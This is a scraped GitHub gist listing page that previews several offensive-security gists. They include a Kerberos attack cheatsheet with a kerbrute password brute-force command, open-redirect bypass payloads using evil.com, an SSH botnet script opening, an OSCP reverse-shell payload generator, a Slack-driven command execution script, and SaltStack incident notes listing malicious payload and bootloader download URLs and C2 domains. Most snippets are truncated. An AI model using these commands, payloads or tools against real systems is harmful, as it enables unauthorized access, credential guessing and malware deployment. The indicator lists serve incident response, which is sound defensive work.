With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
Bart Black reanimat0r
reanimat0r
/ kerberos_attacks_cheatsheet.md
Created
February 23, 2022 12:01
— forked from S3cur3Th1sSh1t/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks
S3cur3Th1sSh1t
/ kerberos_attacks_cheatsheet.md
Created
December 13, 2021 12:58
— forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
-
Simply try to change the domain
Example: ?redirect=https://example.com --> ?redirect=https://evil.com
-
Bypass the filter when protocol is blacklisted using
//Example: ?redirect=https://example.com --> ?redirect=//evil.com
fransr
/ logger.js
Last active
August 6, 2022 06:36
logger.js for hunting script gadgets. More info about script gadgets: https://github.com/google/security-research-pocs/tree/master/script-gadgets (Sebastian Lekies / Eduardo Vela Nava / Krzysztof Kotowicz)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var logger = console.trace; | |
| // ELEMENT | |
| ;(getElementByIdCopy => { | |
| Element.prototype.getElementById = function(q) { | |
| logger('getElementById', q, this, this.innerHTML); | |
| return Reflect.apply(getElementByIdCopy, this, [q]) | |
| } | |
| })(Element.prototype.getElementById) |
m8sec
/ slackexec.py
Last active
July 26, 2022 02:15
Python script to monitor a Slack channel and automate task execution.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| # Author: @m8sec | |
| import os | |
| import threading | |
| from sys import exit | |
| from time import sleep | |
| from datetime import datetime | |
| from subprocess import getoutput | |
| from taser.proto.http import web_request |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import httplib | |
| import urllib | |
| http = httplib.HTTPSConnection('example.com', 443) | |
| cookie = 'your=cookies'; | |
| http.request("GET", "/api/v1/csrf", "", { | |
| 'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36', | |
| 'referer': 'https://example.com/', |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # C2 FQDNs | |
| first seen fqdn | |
| 2019-12-11 23:37:10 updatemanagir.us | |
| 2019-12-20 17:51:05 cmdupdatewin.com | |
| 2019-12-26 18:03:27 scrservallinst.info | |
| 2020-01-10 00:33:57 winsystemupdate.com | |
| 2020-01-11 23:16:41 jomamba.best | |
| 2020-01-13 05:13:43 updatewinlsass.com | |
| 2020-01-16 11:38:53 winsysteminfo.com | |
| 2020-01-20 05:58:17 livecheckpointsrs.com |
m8sec
/ oscp_payload_generator.sh
Last active
July 27, 2024 10:44
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env bash | |
| # Script to quickly and easily create non-meterpreter payloads for the OSCP | |
| # @m8sec | |
| # Note: It is recommeneded to create a new directory before running this | |
| # script. All payloads will be placed in the current directory | |
| IP="127.0.0.1" # <YOUR IP HERE> | |
| PORT=443 # You may have to change this if there are outbound restrictions on the target ;) |
reanimat0r
/ botnet.py
Created
June 19, 2020 21:09
— forked from lava9868/botnet.py
botnet in python
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # basic ssh botnet | |
| import pxssh #calling pxssh module | |
| class Client: #defining class with name client | |
| def_init_(self,host,user,password): | |
| self.host = host | |
| self.user=user | |
| self.password = password | |
| self.session = self.connect() # for ssh session | |
cachedout
/ gist:2950de63aa102ec9ccb895deea1aa539
Created
May 4, 2020 09:37
Mirror of Slack CVE discussion
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## Overview | |
| What we know so far: | |
| Source: https://github.com/saltstack/salt/issues/57057 | |
| Payload distribution point: https://bitbucket.org/samk12dd/git/src/master/ --update: now defunct | |
| Updated payload distrib URL: http://413628.selcdn.ru/cdn/salt-storer | |
| Bootloader distribution link: http://89.223.121.139/sa.sh | |
| backup CNC command source: http://54.36.185.99/c.sh | |
| This is a crypto-mining operation. salt-minions is a compiled xmrig binary (https://github.com/xmrig/xmrig). | |
| salt-store contains a RAT, nspps (https://ironnet.com/blog/malware-analysis-nspps-a-go-rat-backdoor/). |
NewerOlder